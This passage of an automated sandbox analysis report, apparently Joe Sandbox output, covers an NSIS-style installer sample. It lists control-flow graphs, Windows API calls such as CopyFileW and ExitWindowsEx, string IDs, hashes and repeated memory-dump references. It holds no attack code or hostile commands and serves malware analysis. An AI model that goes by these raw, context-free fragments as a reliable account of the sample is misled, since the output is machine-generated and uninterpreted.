                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                                      • String ID: @rD$New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                                                                                      • API String ID: 2110491804-2409696222
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71b8ecf663d6f058a1c3ced55927feebbdcf1e8b0d86afd2c4b352cd48bee751
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                      control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • #17.COMCTL32 ref: 004038A2
                                                                                                                                                                                                                                                                                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                                                                                                                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                                                                                                                                                                      • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                                                                                      • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                                                                                                                                                                                                                                                                                      • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                                                                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                                                                                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                                                                                                                                                                                                                                                                                      • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00403AF1
                                                                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                                                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                                                                                                                                                                                                                                                                                      • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                                                                                                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                                                                      • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                                                                                                                                                                                                                                                                                      • API String ID: 2435955865-239407132
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d9024d5f0e899f809313532158b428341dd342d07cfae74060de4bd372621f4
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                      control_flow_graph 587 406805-406810 588 406812-406821 587->588 589 406823-406837 587->589 588->589 590 406839-406846 589->590 591 40684f-406855 589->591 590->591 594 406848-40684b 590->594 592 406a81-406a8a 591->592 593 40685b-40685c 591->593 596 406a95-406a96 592->596 597 406a8c-406a90 call 406009 592->597 595 40685d-40686a 593->595 594->591 598 406870-406880 595->598 599 406a7f-406a80 595->599 597->596 601 406886-406889 598->601 602 406a5a 598->602 599->592 603 406a5d 601->603 604 40688f-4068cd 601->604 602->603 605 406a6d-406a70 603->605 606 406a5f-406a6b 603->606 607 4068d3-4068de GetVersion 604->607 608 4069ed-4069f6 604->608 611 406a73-406a79 605->611 606->611 612 4068e0-4068e8 607->612 613 4068fc 607->613 609 4069f8-4069fb 608->609 610 406a2f-406a38 608->610 616 406a0b-406a1a call 406009 609->616 617 4069fd-406a09 call 405f51 609->617 614 406a46-406a58 lstrlenW 610->614 615 406a3a-406a41 call 406805 610->615 611->595 611->599 612->613 618 4068ea-4068ee 612->618 619 406903-40690a 613->619 614->611 615->614 628 406a1f-406a25 616->628 617->628 618->613 622 4068f0-4068f4 618->622 624 40690c-40690e 619->624 625 40690f-406911 619->625 622->613 627 4068f6-4068fa 622->627 624->625 629 406913-406939 call 405ed3 625->629 630 40694d-406950 625->630 627->619 628->614 634 406a27-406a2d call 406038 628->634 640 4069d9-4069dd 629->640 641 40693f-406948 call 406805 629->641 632 406960-406963 630->632 633 406952-40695e GetSystemDirectoryW 630->633 637 406965-406973 GetWindowsDirectoryW 632->637 638 4069cf-4069d1 632->638 636 4069d3-4069d7 633->636 634->614 636->634 636->640 637->638 638->636 642 406975-40697f 638->642 640->634 645 4069df-4069eb lstrcatW 640->645 641->636 646 406981-406984 642->646 647 406999-4069af SHGetSpecialFolderLocation 642->647 645->634 646->647 649 406986-40698d 646->649 650 4069b1-4069c8 SHGetPathFromIDListW CoTaskMemFree 647->650 651 4069ca-4069cc 647->651 652 406995-406997 649->652 650->636 650->651 651->638 652->636 652->647
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                                                                                      • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                                                                      • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                                                                      • API String ID: 3581403547-784952888
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93666727498e5f08fd38b631bc67a6e1ad40de3ecc08933b567c44a166c18943
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D

                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                                                      control_flow_graph 886 4074bb-4074c0 887 4074c2-4074ef 886->887 888 40752f-407547 886->888 890 4074f1-4074f4 887->890 891 4074f6-4074fa 887->891 889 407aeb-407aff 888->889 895 407b01-407b17 889->895 896 407b19-407b2c 889->896 892 407506-407509 890->892 893 407502 891->893 894 4074fc-407500 891->894 897 407527-40752a 892->897 898 40750b-407514 892->898 893->892 894->892 899 407b33-407b3a 895->899 896->899 902 4076f6-407713 897->902 903 407516 898->903 904 407519-407525 898->904 900 407b61-407c68 899->900 901 407b3c-407b40 899->901 917 407350 900->917 918 407cec 900->918 906 407b46-407b5e 901->906 907 407ccd-407cd4 901->907 909 407715-407729 902->909 910 40772b-40773e 902->910 903->904 905 407589-4075b6 904->905 913 4075d2-4075ec 905->913 914 4075b8-4075d0 905->914 906->900 911 407cdd-407cea 907->911 915 407741-40774b 909->915 910->915 916 407cef-407cf6 911->916 919 4075f0-4075fa 913->919 914->919 920 40774d 915->920 921 4076ee-4076f4 915->921 922 407357-40735b 917->922 923 40749b-4074b6 917->923 924 40746d-407471 917->924 925 4073ff-407403 917->925 918->916 928 407600 919->928 929 407571-407577 919->929 930 407845-4078a1 920->930 931 4076c9-4076cd 920->931 921->902 927 407692-40769c 921->927 922->911 932 407361-40736e 922->932 923->889 937 407c76-407c7d 924->937 938 407477-40748b 924->938 943 407409-407420 925->943 944 407c6d-407c74 925->944 933 4076a2-4076c4 927->933 934 407c9a-407ca1 927->934 946 407556-40756e 928->946 947 407c7f-407c86 928->947 935 40762a-407630 929->935 936 40757d-407583 929->936 930->889 939 407c91-407c98 931->939 940 4076d3-4076eb 931->940 932->918 948 407374-4073ba 932->948 933->930 934->911 949 40768e 935->949 950 407632-40764f 935->950 936->905 936->949 937->911 945 40748e-407496 938->945 939->911 940->921 951 407423-407427 943->951 944->911 945->924 955 407498 945->955 946->929 947->911 953 4073e2-4073e4 948->953 954 4073bc-4073c0 948->954 949->927 956 407651-407665 950->956 957 407667-40767a 950->957 951->925 952 407429-40742f 951->952 959 407431-407438 952->959 960 407459-40746b 952->960 963 4073f5-4073fd 953->963 964 4073e6-4073f3 953->964 961 4073c2-4073c5 GlobalFree 954->961 962 4073cb-4073d9 GlobalAlloc 954->962 955->923 958 40767d-407687 956->958 957->958 958->935 965 407689 958->965 966 407443-407453 GlobalAlloc 959->966 967 40743a-40743d GlobalFree 959->967 960->945 961->962 962->918 968 4073df 962->968 963->951 964->963 964->964 970 407c88-407c8f 965->970 971 40760f-407627 965->971 966->918 966->960 967->966 968->953 970->911 971->935
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID: 310444273-0
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2178084641.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178056803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178119701.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178158506.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2178667131.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_6684V5n83w.jbxd
                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                      • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                                                                                      • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                                                      • Not Executed
